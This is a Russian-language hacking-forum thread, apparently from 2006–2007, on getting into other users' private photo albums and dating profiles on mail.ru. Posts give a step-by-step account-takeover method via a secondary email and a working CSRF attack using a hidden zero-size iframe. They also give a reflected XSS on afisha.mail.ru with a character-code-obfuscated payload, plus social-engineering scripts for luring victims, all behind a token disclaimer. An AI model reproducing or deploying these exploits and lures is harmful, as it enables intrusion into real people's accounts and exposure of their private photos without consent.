ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
20.11.2006, 17:32
|
|
Постоянный
Регистрация: 16.05.2006
Сообщений: 449
Провел на форуме:
3383265
Репутация:
843
|
|
Узнай вторичное мыло (там в серверах знакомств мэил ру при реггистрации надо указать его) Обычно это мыло не используеться и чащу почему то на яндексе.Ломани его ,напиши жертве в анкету знакомств ,зайди на сломанную почту ,там будет письмо ОДНО ПРОПУЩЕННОЕ СООБЩЕНИЕ
Заходишь в письмо ,там будет ссылка на сообщение и как токо на нее жмешь,ты автоматом в ее анкете  то есть ты залогинин под ее аккаунтом  |
|
|
20.11.2006, 20:21
|
|
Познающий
Регистрация: 28.03.2006
Сообщений: 90
Провел на форуме:
395323
Репутация:
25
|
|
Ок, попробую.....
|
|
|
|
05.01.2007, 15:58
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме:
4155100
Репутация:
2033
|
|
Есть и более простой вариант.
1. Смотрим, какой URL-вид имеет запрос на добавление пользователя в список избранных (вкладка "управление доступом"):
Код HTML:
http://my.foto.mail.ru/cgi-bin/friends?email=twoemilo%40mail.ru&add=%414%43E%431%430%432%438%442%44C
2. Теперь просто нужно заставить нажать жертву на эту ссылку и прописанный в ней мейл окажется в списке избранных. Плюс незаметность. Что делаем для этого: регим свой сайтец, туда заливаем html-страничку с нулевым фреймом:
Код HTML:
<iframe src=http://my.foto.mail.ru/cgi-bin/friends?email=twoemilo%40mail.ru&add=%414%43E%431%430%432%438%442%44C width=0 height=0 border=0>
3. Плюс СИ для заманивания жервы на твой сайтец. Здесь уже на твой вкус и фантазию... Самое простое (почтой пишешь):
- Слушай, а ты не размещаешь свои фотки еще где-то в нете? Сайта у тебя нет?
- Нет.
- А я вот нашел с твоими фотками сайт - http://mysite.ru/mypage.html
(И, естественно, на страничке тегами img paзмещаешь несколько ее/не ее (жертвы) фоток для беспалевности).
4. Этот вариант прокатит, если закрытый альбом доступен для избранных, что наиболее часто встречается, если он доступен только для создателя, придется смотреть, какой Url-вид имеет запрос на открытие альбома в общий доступ (более беспалевный, но более сложный вариант - в доступ для избранных + добавление тебя в избранные одним нажатием жертвы) и дальше действовать по аналогии.
____________________
Корректировочка.
Проделав все вышеописанное теперь вы станете всего лишь "Любимым автором", а не "Избранным". В пост-запросе появились два дополнительных поля, поэтому и мы внесен свои поправки.
Код HTML:
<iframe src=http://my.foto.mail.ru/cgi-bin/friends?email=twoemilo%40mail.ru&type=1&add=1 width=0 height=0 border=0></iframe>
Также осталось необязательное второе поле add, его мы опускаем.
Последний раз редактировалось LeverOne; 15.07.2007 в 05:39..
|
|
|
|
15.07.2007, 01:15
|
|
Познающий
Регистрация: 10.04.2006
Сообщений: 94
Провел на форуме:
453465
Репутация:
56
|
|
"если он доступен только для создателя"
А на кой хрен тогда нужен альбом? =)
|
|
|
|
15.07.2007, 20:36
|
|
Познающий
Регистрация: 22.02.2006
Сообщений: 67
Провел на форуме:
4155100
Репутация:
2033
|
|
Сообщение от invlose
они иногда блокируются(не отображаются)
5. Это верно. Такой способ не сработает, например, в IE.
Известная причина тому - невозможность загрузить во фрейм страницу другого сайта, имеющую ограничения по доступу только для авторизованного пользователя.
Все, что нам нужно сделать для обхода, это найти банальную пассивную ХSS и прописать код с ее учетом. ХSS в данном случае поможет нам выполнить отправку запроса непосредственно внутри домена.
Демонстрация.
1) пассивную на мыл ру иногда бывает интересно поискать только с целью обхода фильтрации. Например
PHP код:
http://afisha.mail.ru/events.html?cd=1&placetype=2
Фильтрация имеется в обоих параметрах полей гет-запроса (то, что идет после cd= и placetype= ).
PHP код:
location.href='?city='+city_c+'&placetype=2%3Clo%3E';
Но если мы проверим фильтрацию в самих названиях полей.
PHP код:
http://afisha.mail.ru/events.html?cd=1&placetype<lo>=2
ее там не окажется,  и вы увидите что-то типа
PHP код:
location.href='?city='+city_c+'&placetype<lo>=2';
Следовательно, xss примет вид
PHP код:
http://afisha.mail.ru/events.html?cd=1&placetype</script><script>alert(/lo/)</script>=2
2) часть скрипта, отправляющая внутридоменный запрос на добавление вас в список избранных, будет выглядеть по-прежнему также, но добавляем обработчик загрузки фрейма, чтобы быть уверенными, что запрос на фото.майл.ру отправлен (второй вариант, - использование settimeout(), - менее предпочтителен, на мой взгляд)
[PHP]
PHP код:
<iframe src=http://my.foto.mail.ru/cgi-bin/friends?email=twoemilo%40mail.ru&type=1&add=1 width=0 height=0 border=0 onload=document.location.href='http://twoisait.ru/1_.html';></iframe>
кодируем все вместе в Char
PHP код:
String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,109,121,46,102,111,116,111,46,109,97,105,108,46,114,117,47,99,103,105,45,98,105,110,47,102,114,105,101,110,100,115,63,101,109,97,105,108,61,116,119,111,101,109,105,108,111,37,52,48,109,97,105,108,46,114,117,38,116,121,112,101,61,49,38,97,100,100,61,49,32,119,105,100,116,104,61,48,32,104,101,105,103,104,116,61,48,32,98,111,114,100,101,114,61,48,32,111,110,108,111,97,100,61,100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,39,104,116,116,112,58,47,47,116,119,111,105,115,97,105,116,46,114,117,47,49,95,46,104,116,109,108,39,59,62,60,47,105,102,114,97,109,101,62)
3) собираем сплойт, который будет висеть на странице нашего сайта и ссылку на которую будем давать юзеру. При этом указываем язык - JScript, чтобы заточить сплойт под IE. JScript будет понятен только IE.
PHP код:
<script language="JScript">document.location.href='http://afisha.mail.ru/events.html?cd=1&placetype\'}<\/script><script>document.write(String.fromCharCode(60,105,102,114,97,109,101,32,115,114,99,61,104,116,116,112,58,47,47,109,121,46,102,111,116,111,46,109,97,105,108,46,114,117,47,99,103,105,45,98,105,110,47,102,114,105,101,110,100,115,63,101,109,97,105,108,61,116,119,111,101,109,105,108,111,37,52,48,109,97,105,108,46,114,117,38,116,121,112,101,61,49,38,97,100,100,61,49,32,119,105,100,116,104,61,48,32,104,101,105,103,104,116,61,48,32,98,111,114,100,101,114,61,48,32,111,110,108,111,97,100,61,100,111,99,117,109,101,110,116,46,108,111,99,97,116,105,111,110,46,104,114,101,102,61,39,104,116,116,112,58,47,47,116,119,111,105,115,97,105,116,46,114,117,47,49,95,46,104,116,109,108,39,59,62,60,47,105,102,114,97,109,101,62))<\/script>=2';</script>
Пихаем это на свою страницу вместе с кодом, где используется один ифрейм (см. пост выше). Когда пользователь заходит по ссылке на вашу страницу (1.html - напр), его перебрасывает на страницу маиловского поддомена, на которой открывается нулевой ифрейм со страницей фото.майл. Выполняется внутридоменный запрос, что разрешено IE. Потом юзера снова перебрасывает на ваш сайт (1_.html), где вы можете разместить, что вы ему обещали.
Под IE имеется побочный эффект: на некоторое время будет мелькать страница с xss, что обычно не вызывает подозрений.
Отличия и преимущества этого метода от кражи кук очевидны - не нужно ничего ждать, кроме того, даже если у юзера стоит привязка куков к айпи и запрет одновременных сессий, этот способ все равно подойдет.
П.С.
Если у вас уже ничего не работает, взгляните на дату этого поста - "вчера" это уже "вчера", а полгода назад это вообще смешно.
_________________________________
Под словами "вы", "мы" и "юзер" я понимаю одних и тех же людей! Используйте этот способ только для добавления СЕБЯ в свой список избранных! Предупреждение: использование описанного способа для просмотра чужих фотографий, получения доступа к иным конфиденциальным сведениям является уголовно наказуемым деянием. Автор не несет никакой ответственности за использование данного материала в противозаконных целях другими лицами. Вся информация представлена в ознакомительных целях. Форма изложения диктуется сугубо художественным замыслом наиболее удобного для восприятия изложения мысли.
|
|
|
|
20.07.2007, 20:40
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Сообщение от LeverOne
Корректировочка.
Проделав все вышеописанное теперь вы станете всего лишь "Любимым автором", а не "Избранным". В пост-запросе появились два дополнительных поля, поэтому и мы внесен свои поправки.
Код HTML:
<iframe src=http://my.foto.mail.ru/cgi-bin/friends?email=twoemilo%40mail.ru&type=1&add=1 width=0 height=0 border=0></iframe>
Также осталось необязательное второе поле add, его мы опускаем.
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
